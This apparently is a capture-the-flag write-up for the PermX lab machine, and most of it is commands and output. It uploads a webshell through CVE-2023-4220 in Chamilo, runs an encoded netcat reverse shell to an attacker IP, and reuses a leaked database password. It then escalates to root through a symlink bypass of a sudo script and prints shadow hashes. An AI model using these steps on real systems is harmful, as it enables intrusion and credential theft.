Basic information

Port scanning

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.11.23
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-08 13:12 CST
Nmap scan report for 10.10.11.23
Host is up (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.05 seconds

80

A hosts entry is needed:

10.10.11.23 permx.htb

It is an online learning platform:

Subdomain scanning

The main site has nothing of interest; subdomain enumeration turns up lms:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://permx.htb/" -H 'Host: FUZZ.permx.htb'  -fw 18

lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 142ms]

lms

After adding the hosts entry and visiting it, the site turns out to be built on Chamilo:

CVE-2023-4220

Searching turns up the related Chamilo vulnerability:

Follow the method in the article to obtain a webshell:

curl -F 'bigUploadFile=@miao.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/miao.php?cmd=id

reverse shell

Then execute a command through the webshell to get a reverse shell:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.16%204444%20%3E%2Ftmp%2Ff

python3 -c 'import pty;pty.spawn("/bin/bash")'

Information

Routine digging through the configuration files yields the database configuration:

$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
$_configuration['db_manager_enabled'] = false;
$_configuration['root_sys'] = '/var/www/chamilo/';
$_configuration['url_append'] = '';

user flag

Basic password reuse: the mtz user reuses the database password:

ssh mtz@10.10.11.23
03F6lY3uXAP2bkW8

Privilege escalation information

The mtz user can run the specified acl.sh via sudo. Its contents grant a specified user permissions on a specified file, with some simple filtering, and it ultimately calls setfacl:

The logic is very simple: the target must start with mtz's home directory, and the usual .. traversal is filtered, but a symlink bypasses the check.
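As an added illustration (not the box's own acl.sh, whose source the writeup does not reproduce), the following shows a prefix-and-".." check of the kind described above next to a canonicalizing check that closes the symlink bypass; ALLOWED_ROOT is an assumed stand-in for the restricted home directory:

```shell
#!/bin/sh
# Added example, not the box's /opt/acl.sh: a weak target-path check of the
# kind described above, beside a hardened one that canonicalizes first.
# ALLOWED_ROOT is a hypothetical stand-in for the sudoers-restricted home dir.
ALLOWED_ROOT="${ALLOWED_ROOT:-/home/mtz}"

# Weak check: string prefix match plus a ".." filter. It never follows
# symlinks, so "$ALLOWED_ROOT/miao/etc/passwd" passes when miao -> /.
weak_check() {
    target="$1"
    case "$target" in
        "$ALLOWED_ROOT"/*) ;;   # must start with the allowed root
        *) return 1 ;;
    esac
    case "$target" in
        *..*) return 1 ;;       # reject literal traversal components
    esac
    return 0
}

# Hardened check: resolve every symlink and "."/".." component first,
# then require the resolved path to sit under the resolved root.
hardened_check() {
    target="$1"
    resolved=$(readlink -f -- "$target") || return 1
    [ -e "$resolved" ] || return 1
    root=$(readlink -f -- "$ALLOWED_ROOT") || return 1
    case "$resolved" in
        "$root"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Even the hardened check leaves a check-then-setfacl race (the link can be
# swapped in between); the robust fix is a sudoers rule that never lets an
# unprivileged user choose the path at all.
```

Running weak_check and hardened_check against a symlink that points at / shows the first accepting and the second rejecting the same path.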

Privilege escalation & root flag

Create a symlink and use it to change file permissions, for example on shadow or passwd, then add a root user:

ln -s / miao

sudo /opt/acl.sh mtz rwx /home/mtz/miao/etc/passwd

openssl passwd "password"
$1$vudO3hjG$iKCmxTMP.FoY3NBjUgxmr/
echo 'miao:$1$vudO3hjG$iKCmxTMP.FoY3NBjUgxmr/:0:0:root:/root:/bin/bash' >> /home/mtz/miao/etc/passwd

su miao
# the password is the one set above: password

shadow

root:$y$j9T$VEMcaSLaOOvSE3mYgRXRv/$tNXYdTRyCAkwoSHhlyIoCS91clvPEp/hh0r4NTBlmS7:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::

References